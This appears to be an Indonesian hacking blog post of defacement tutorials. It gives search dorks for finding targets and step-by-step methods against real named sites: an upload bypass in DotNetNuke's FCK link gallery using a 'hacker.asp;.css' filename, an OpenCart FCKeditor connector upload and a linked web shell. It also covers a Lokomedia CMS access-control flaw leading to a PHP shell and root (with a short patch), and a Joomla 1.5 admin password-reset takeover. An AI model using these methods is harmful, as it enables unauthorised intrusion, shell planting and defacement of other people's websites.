DORK :
inurl:Fck/fcklinkgallery.aspx
atau
/portals/0/
inurl:tabid/176/Default.aspx
pilih salah satu dork nya,,
klo udah ketemu target nya tambahkan ini "providers/htmleditorproviders/fck/fcklinkgallery.aspx
di sini saya menggunakan dork inurl:Fck/fcklinkgallery.aspx dan target http://www.pivocom.com/ sebagai contohnya..
sehingga akan menjadi seperti ini :
"http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx"
setelah nge klik itu, tnggu loading selesai baru kamu harus klik
"(File A file on your site)
dang anti alamat protocol website nya jadi :
"javascript:__doPostBack('ctlURL$cmdUpload','' )" => [ tanpa tanda kutip 2 ]
ntar keluar sendiri tuh, tombol browse ny kya gini..
gambar : http://i868.photobucket.com/albums/ab247/pajenkblog/tut1.jpg
klo udah upload file yang pgn kamu masukin,,
file yang bisa di upload antara lain:
*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
klo gk punya shell nya download aja di sini http://www.mediafire.com/?zqvx2ajbyc4b17j
tapi gk smua web yang bisa upload file .html,
ada bbrapa situs yg hanya bisa upload file .txt
sebelum upload ubah ekstensi nya menjadi css
misal : hacker.asp;.css ingat ! kita harus menambahkan titik nya dua kali [contohnamashell(.)asp(.)css] sehingga berakhiran ".asp;.css" misal : "hacker.asp;.css"
upload, trus ktia buka hasil deface nya . .
kita liat dlu tadi nama file yang kita upload apa
misal : "hacker.asp;.css" kita buka alamat protocol nya
caranya : ' kan tadi alamat nya "http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" [ dengan catatan setelah kita berhasil/ selesai upload ]
nah..abis itu kamu ganti alamat "http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" menjadi alamat halaman defaced kita menjadi http://www.pivocom.com/portals/0/pajenk.asp;.css intinya kita harus menambahkan "portals/0/" pada akhir http://www.pivocom.com/
*****deface dengan metode opencart*****
maaf ini khusu bwat newbi yg ingin blajar,,klo udah master mohon bimbingannya ..
seperti biasa nyarinya lewat paman google
dork nya :
Powered By OpenCart site:com (site nya bisa kamu ganti,seperti my,il, dll yang penting suport opencart)
klo pengen smuanya,site nya ilangun jadi gini aja Powered By OpenCart
langsung ke caranya,,
jika kamu sudah mendapatkan target nya
contoh target http://www.digitalbazzar.co.uk/shop bisa juga www.digitalbazzar.co.uk/cart,
www.digitalbazzar.co.uk/patch dll
klo udah dapet targetnya tinggal kita inject exploitnya
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
jadinya kya gini http://www.digitalbazzar.co.uk/shop/...tors/test.html
klo ketemu yang kya gini http://digitalbazzar.co.uk/shop/
kamu inject di blakang /shop/ nya..
maka akan muncul tampilan seperti ini..
gambar :
jangan lupa connectornya di ganti jadi PHP.
lalu kamu masukin file deface kamu,jika berhasil maka ada bacaan alert seperti ini "file uploaded with no errors"
untuk melihat apakan berhasil di upload atau tidak kamu ke "Get Folders and Files" dan lihat hasilnya... :P
jika berhasil kamu tinggal masukin nama file deface kamu di blakang site nya,,
maka hasilnya seperti ini..
http://www.digitalbazzar.co.uk/
******Patch Bug CMS Lokomedia*****
DORK=allinurl:/media.php?module=berita
Kesalahan sang programmer berada di file /admin/content.php yang tidak menyertakan start session() untuk menyaring / membedakan antara user biasa dan administrator. sehingga dari URL browser saya lansung megetikkan url :
"http://www.contohcms.com/admin/content.php?module=user"
Apa yang terjadi? Saya lalu di lempar ke halam yang berfungsi untuk menginputkan user baru (yang seharusnya user baru dikelola oleh admin web) Saya klik tombol Tambah User.
Setelah menginputkan user baru dan menyimpan nya saya dilempar lagi ke halaman yang bertulisan "Untuk Mengakses Modul Anda Harus Login" Lalu saya login dengan mengetikkan username dan password yang baru saja saya inputkan tadi.
Hasilnya.......!!!! Saya pun berhasil login (Meski Belum menjadi Administrator) berikutnya saya mengganti URL Pada browser menjadi "http://www.contohcms.com/admin/content.php?module=berita" Saya kemudian menginputkan sebuah berita dengan judul asal-asalan, kategori=terserah, isi berita= terserah, foto berita='kosong' simpan berita tersebut, kemudian lakukan edit berita yang beru saja saya inputkan.
Sekarang saya mau mengganti foto berita yang tadinya masih kosong, saya mau mengganti dengan Shell PHP (Bisa anda download di Kategori Download Pada Blog ini) Ternyata sang programmer tidak memproteksi jenis extension file yang akan di upload, Al hasil saya berhasil mengupload shell php ke server terletak di folder /admin/foto-berita/shell.php.
Saya mengeksekusi shell tersebut, dan........(Selanjutnya Terserah Anda:: Mau mendeface, memberitahukan ke admin website, atau mau melumpuhkan total website tersebut--Namun Bersikaplah selayaknya Hacker sesuai dengan Etika hacking ) tidak hanya menjadi administraotr di website tersebut saya pun menjadi Root di server tempat website tersebut di hosting.
PATCH
untuk memperbaiki bugs pada CMS Lokomedia bisa dengan memberikan Patch pada file /admin/content.php
dengan menambahkan penggalan kode berikut :
session_start();
if (empty($_SESSION[namauser]) AND empty($_SESSION[passuser])){
echo "Maaf anda tidak berhak menjalankan modul ini";
}
else{
.....Statement
}
Menambahkan penggalan kode yang sama di file /admin/aksi.php
session_start();
if (empty($_SESSION[namauser]) AND empty($_SESSION[passuser])){
echo "Maaf anda tidak berhak menjalankan modul ini";
}
else{
.....Statement
}
menyaring file yang akan di upload kode pada file aksi.php saat mengedit berita dengan penggalan kode berikut:
if ($tipe_file != "image/jpeg" AND $tipe_file != "image/pjpeg"){
echo "Gagal menyimpan data !!!
Tipe file $nama_file : $tipe_file
Tipe file yang diperbolehkan adalah : JPG/JPEG.
";
echo "Ulangi Lagi";
}
else{
.....statement
}
sumber
buku Jalan Pintas Menjadi Master PHP karangan Lukmanul Hakim.
*****jomla patching********
sempet kepikiran ga akan bikin thread lagi karna udah di infract oleh om momod yang ganteng...
tapi bodo akh yang penting bisa share .. maap ya om kalo salah lagi
for : joomla 1.5.x
kett :
* untuk joomla 1.5.x tepatnya 1.5.0 -1.5.5 DIATAS 1.5.5 udah di patch
** administrator situs belum merubah default user administrator
***untuk joomla 1.5.x yang belum di patch
1. cari situs yang memakai joomla, dork : inurl:option=com_user
2. misal target : http://www.sayaganteng.go.id/index.p...er&view=login&....
3. ganti url tersebut menjadi http://www.sayaganteng.go.id/index.p...layout=confirm
4.kita akan masuk ke sebuah halaman untuk mengakses token (disinilah keberuntungan kita jika admin tersebut lengah) masukan token '
5.jika berhasil maka akan keluar form untuk mereset password .. (ganti password tersebut sesuai kata hati kita) :Ngakak
6.click submit atau enter maka password default administrator akan di rubah.
7.masuk www.sayaganteng.go.id/administrator setelah itu login sebagai admin ..
username: admin
password : sesuai kata hati kita :Ngakak
8. jika login berhasil .. masuk ke menu template manajer .. cari template yang bertanda bintang dan rubah index.php dengan kode html yang kita inginkan
sabar kunci utamanya
semoga berhasil
0 komentar:
Posting Komentar